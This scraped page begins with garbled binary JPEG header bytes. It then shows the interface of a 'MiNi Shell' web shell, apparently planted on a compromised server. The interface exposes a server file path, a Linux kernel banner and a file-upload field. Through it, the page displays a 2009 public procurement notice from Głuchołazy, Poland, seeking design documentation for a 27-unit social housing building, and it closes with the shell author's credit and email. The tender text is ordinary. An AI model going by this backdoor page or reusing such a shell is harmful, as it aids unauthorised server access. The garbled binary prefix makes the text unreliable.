JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090528/81311-N-2009.html

<p class="kh_header"><b>Głuchołazy: Wykonanie dokumentacji projektowej budynku mieszkalnego wielorodzinnego z lokalami socjalnymi w Głuchołazach przy ul. Kolejowej, dz. nr ewid 766/42, dr. 766/41, 200/3 wraz z zagospodarowaniem terenu wokół projektowanego budynku.</b><br>
<b>Numer ogłoszenia: 81311 - 2009; data zamieszczenia: 28.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Głuchołaz , Rynek 15, 48-340 Głuchołazy, woj. opolskie, tel. 077 4092100, faks 077 4092101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glucholazy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowej budynku mieszkalnego wielorodzinnego z lokalami socjalnymi w Głuchołazach przy ul. Kolejowej, dz. nr ewid 766/42, dr. 766/41, 200/3 wraz z zagospodarowaniem terenu wokół projektowanego budynku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> II. Wymagania techniczne:
Budynek mieszkalny wielorodzinny z lokalami socjalnymi winien być zaprojektowany zgodnie z wydaną przez Burmistrza Głuchołaz  decyzją o warunkach zabudowy , określającą szczegółowe warunki budowy w zakresie wymogów dla obiektu kubaturowego, zagospodarowania terenu, obsługi w zakresie infrastruktury technicznej i komunikacji, ustawą o ochronie praw lokatorów, mieszkaniowym zasobie gminy i o zmianie Kodeksu cywilnego z dnia 21 czerwca 2001 r.,( Dz. U. z 2001r., Nr 71, poz. 733.), ustawą z dnia 8 grudnia 2006r. o finansowym wsparciu tworzenia lokali socjalnych, mieszkań chronionych, noclegowni i domów dla bezdomnych (Dz. U. Nr 251,poz.1884), rozporządzeniem Ministra Budownictwa z dnia 15 marca 2007r. w sprawie szczegółowego trybu i terminów składania i rozpatrywania wniosku o udzielenie finansowego wsparcia na tworzenie lokali socjalnych i mieszkań chronionych, treści wniosku, kryteriów jego oceny, wzoru formularza rozliczenia udzielonego wsparcia oraz minimalnych wymagań w zakresie wyposażenia, jakie muszą spełniać pozyskane lokale mieszkalne (Dz. U. Nr 52, poz.346 z późn .zm.) oraz obowiązującymi przepisami .
Opracowanie projektu obejmuje:
1. Wykonanie projektu zagospodarowania terenu w granicach działki 766/42, dr 766/41, dr 200/3, uwzględniający lokalizację budynku wielorodzinnego z min. 27 lokalami socjalnymi, przyłączy infrastruktury technicznej, parkingu, dojścia do budynku, elementy małej architektury, zieleń i oświetlenie terenu. Całość zagospodarowania należy powiązać z istniejącym systemem komunikacyjnym. Śmietnik należy zaprojektować z uwzględnieniem pojemników na śmieci o poj. 1,1 m3. Odwodnienie terenu - do kanalizacji deszczowej. Projekt zagospodarowania terenu powinien uwzględniać wykonanie projektu przyłączy infrastruktury technicznej.
2. Projekt budowlany i wykonawczy winien obejmować branże: architektoniczną, konstrukcyjną, sanitarną i elektryczną.
3. Założenia projektowe: budynek powinien być podpiwniczony, trzykondygnacyjny (parter + 2 kondygnacje), dach płaski. Materiały wykończeniowe zapewniające trwałość i estetykę. Elewacja zewnętrzna z wyłączeniem styropianu na zewnątrz, alternatywnie np. ściany warstwowe. Projekt powinien uwzględniać przewidywany koszt wykonania 1m2  powierzchni budynku - do 2.000 zł.
a) Budynek powinien się składać z mieszkań dostępnych z klatki schodowej. Mieszkania dostosowane dla osoby niepełnosprawnej usytuowane na parterze. Dostęp na parter do mieszkań dla osób niepełnosprawnych poprzez pochylnię zewnętrzną. W budynku zlokalizować pomieszczenie na wózki/ rowery. Mieszkania wyposażone w balkony o konstrukcji odrębnej od budynku. Kotłownia centralnego ogrzewania - gazowa. Powierzchnia użytkowa ok. 1000 m2.

b) Struktura mieszkań - minimum 27 mieszkań socjalnych, w tym 3 mieszkania dla osób niepełnosprawnych na parterze (w tym jedno mieszkanie jednoosobowe). Budynek powinien zawierać: 16 lokali jednoosobowych (w tym 1 dla osoby niepełnosprawnej), 2 lokale dwuosobowe, 6 lokali trzyosobowych, 3 lokale czteroosobowe. Przy opracowaniu dokumentacji projektowej należy uwzględnić minimalne wymagania w zakresie wyposażenia, jakie muszą spełniać lokale mieszkalne pozyskane przy udziale finansowego wsparcia. Mieszkanie jednoosobowe winno się składać co najmniej z pokoju z aneksem kuchennym wraz z łazienką (umywalka, prysznic, miska ustępowa). W lokalach mieszkalnych należy zainstalować: w łazience - kabinę natryskową, umywalkę, miskę ustępową, w kuchni - zlewozmywak, kuchenkę elektryczną z piekarnikiem. Powierzchnia pokoi przypadająca na członka gospodarstwa domowego nie może być mniejsza niż 5m2, a wypadku jednoosobowego gospodarstwa domowego 10 m2..Struktura mieszkań jest poglądowa, gdyż uwzględnia tylko potrzeby Zamawiającego. Struktura mieszkań musi być na etapie projektowania uzgodniona i zatwierdzona przez Zamawiającego.

c) Instalacje: budynek winien być wyposażony w instalację wewnętrzną wod.-kan., elektryczną (należy przewidzieć kuchenki elektryczne), ogrzewanie: kotłownia gazowa w budynku oraz kolektory słoneczne. Należy przewidzieć rozwiązania umożliwiające dostęp do instalacji z zewnątrz lokali mieszkalnych (możliwość łatwego odcięcia i włączenia przez administratora). Należy przeprowadzić analizę ekonomiczną dla zastosowania pompy ciepła jako alternatywnego źródła ogrzewania.

d) Wykończenie mieszkań:- tynki cementowo - wapienne III kat., - podłogi - pokój wykładzina rolowana PCV , - malowanie - farby emulsyjne; kuchnia oraz lamperie na klatce , - łazienki - płytki ceramiczne, - stolarka okienna - PCV, - stolarka drzwiowa typowa drewniana o podwyższonej wytrzymałości.

4. Do zadań wykonawcy należy:
- pozyskanie mapy dla celów projektowania w skali 1:500 terenu objętego projektowaniem.
- pozyskanie niezbędnych uzgodnień dla tego typu dokumentacji oraz warunków   
  technicznych przyłączenia,
- złożenie wniosku oraz uzyskanie pozwolenia na budowę. 
UWAGA!
Projektant winien przedłożyć Zamawiającemu w terminie 1 miesiąca od daty podpisania umowy koncepcję zagospodarowania terenu oraz rozwiązania funkcji lokali socjalnych w budynku. Koncepcja po zaakceptowaniu przez Zamawiającego będzie podstawą do podjęcia prac projektowych.

5. Dokumentację należy wykonać w ilościach:
- projekt budowlany  - 6 egz.
- projekt wykonawczy - 2 egz. 
- kosztorys inwestorski - 2 egz.
- kosztorys ofertowy - 2 egz.
- przedmiar robót - 2 egz.
- specyfikacja technicznego wykonania i odbioru robót objętych opracowaniem - 2 egz. 
Projekt i wszystkie jego elementy należy wykonać w wersji elektronicznej:
- opis techniczny należy dostarczyć w formie tekstowej zgodnie z MS Word (pdf lub doc.)
- kosztorysy dostarczyć w formacie programu, w jakim są tworzone oraz w formacie ATH, WORD, PDF.
- mapy, rysunki techniczne, przekroje, rozwiązania szczegółowe należy dostarczyć w wersji elektronicznej w oryginalnym formacie oraz wyeksportowane do formatu rastrowego (JPEG).
Rozdzielczość i skala eksportu do formatu rastrowego 1:1.
Stopień kompresji nie może powodować zamazywania szczegółowego obrazu.

6. W kosztach opracowania należy uwzględnić :
Koszt map do celów projektowych.
Opłaty za wydanie warunków technicznych.
Opłaty za uzgodnienia i pozwolenia.
Koszty związane z dojazdami.
Koszty ewentualnych prób i badań.
Koszty dojazdów i pobytów.

III. Wymagania użytkowe:
1.	Projekt budowlany i wykonawczy powinien być opracowany zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno- użytkowego (Dz. U. Nr  202,poz.2072 z późn .zm.) oraz zawierać opis zadania budowlanego, w którym podaje się przeznaczenie ukończonych robót budowlanych oraz stawiane im przez Zamawiającego wymagania techniczne, ekonomiczne, architektoniczne, materiałowe i funkcjonalne. Na podstawie wykonanego projektu budowlanego zostanie złożony wniosek o wydanie pozwolenia na budowę w Starostwie Powiatowym w Nysie i wniosek aplikacyjny o przyznanie dotacji finansowej ze środków rządowych dla inwestycji polegającej na budowie budynku socjalnego.
2.	Okres gwarancji - 2 lata.
3.	Zobowiązanie Wykonawcy do dokonywania na wezwanie zamawiającego niezbędnych uzupełnień i poprawek w dokumentacji w terminie nie dłuższym niż 4 dni.
4.	Wykonawca projektu sprawować będzie nadzór autorski  w zakresie obejmującym
a)	wyjaśnienia Inwestorowi i Wykonawcy robót budowlanych wątpliwości dotyczących projektu budowlanego- wykonawczego i zawartych w nim rozwiązań oraz ewentualne uzupełnienia szczegółów dokumentacji projektowej 
b)	 uzgodnienie z zamawiającym i Wykonawcą robót budowlanych możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w dokumentacji projektowej w odniesieniu do materiałów oraz rozwiązań konstrukcyjnych i technologicznych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0, 71.22.10.00-3, 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.  Posiadanie przez wykonawcę uprawnień do wykonywania działalności lub czynności objętych niniejszym zamówieniem oraz niepodleganie    wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004 r.  (tekst jednolity Dz.U. z 2006r. Nr 164, poz. 1163, z późn. zm.) Prawo zamówień publicznych.
2. Posiadanie przez wykonawcę niezbędnej wiedzy, doświadczenia i dysponowanie osobami zdolnymi do wykonania zamówienia.
Brak spełnienia któregokolwiek  warunku wymienionego powyżej spowoduje wykluczenie wykonawcy z niniejszego postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej - jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej - potwierdzające uprawnienia do wykonywania  działań lub czynności objętych niniejszym zamówieniem
2. oświadczenia wykonawcy (łącznie wszystkich Partnerów) o spełnianiu przesłanek zawartych  w art. 22 ust. 1 pkt 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych  (tekst jednolity Dz.U. z 2007r. Nr 223, poz. 1655, z 2008 r Dz.U. Nr. 171, poz.1058) sporządzone według wzoru stanowiącego załącznik nr 2 do SIWZ.
   1. wykaz  zrealizowanych w okresie ostatnich trzech  lat przed dniem wszczęcia postępowania ( a przypadku gdy okres działalności jest krótszy - w tym okresie), minimum jednego projektu budowy, przebudowy, rozbudowy lub remontu budynku mieszkalnego wielorodzinnego o pow. min. 800 m2, którego realizację zakończono i odebrano protokołem odbioru końcowego do dnia upływu terminu składania ofert - wraz z załączeniem kopii dokumentów potwierdzających, że prace te zostały wykonane należycie.
Uwaga: wykaz zamówień musi zostać opieczętowany i podpisany przez osobę/y właściwą/e do reprezentowania Wykonawcy.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagany wykaz może być złożony wspólnie lub oddzielnie przez wykonawcę.
2. wykaz osób, którymi dysponuje lub będzie dysponował wykonawca tj. posiadających uprawnienia do projektowania (dot.branż: architektonicznej, konstrukcyjno-budowlanej, drogowej, elektrycznej, sieci wodociągowych, kanalizacyjnych i cieplnych), i które będą uczestniczyć w wykonywaniu zamóweinia, wraz z informacjami na temat kwalifikacji zawodowych i ich wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności - zgodnie z zał. Nr 4 siwz 
3. pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli  w wykazie, o którym mowa w pkt 2 tabeli Wykonawca wskazał osoby,  którymi będzie dysponował
4. uprawnienia oraz aktualne zaświadczenia o przynalezności do właściwego samorządu zawodowego wraz z informacją o o opłaceniu obowiązkowych składek od odpowiedzialności cywilnej 
Uwaga: wykaz uprawnień musi zostać opieczętowany i podpisany przez osobę/y właściwą/e do reprezentowania Wykonawcy.
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, wymagany wykaz może być złożony wspólnie lub oddzielnie przez wykonawcę.
Do Wykonawcy mającego siedzibę lub miejsce zamieszkania poza terytorium RP ma zastosowanie ponadto § 2  Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r.( Dz.U. Nr 87, poz..605 z późn. zm.)  w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawców, oraz form,  w jakich te dokumenty mogą być składane ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://gmina.glucholazy.sisco.info/?przetargi=1&rok=2009.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Głuchołazach ul. Rynek 15  48-340 Głuchołazy, sekretariat-pok. nr 11.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2009 godzina 10:00, miejsce: Urząd Miejski w Głuchołazach ul. Rynek 15  48-340 Głuchołazy, Wydział Zamówień Publicznych pok. nr 11.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com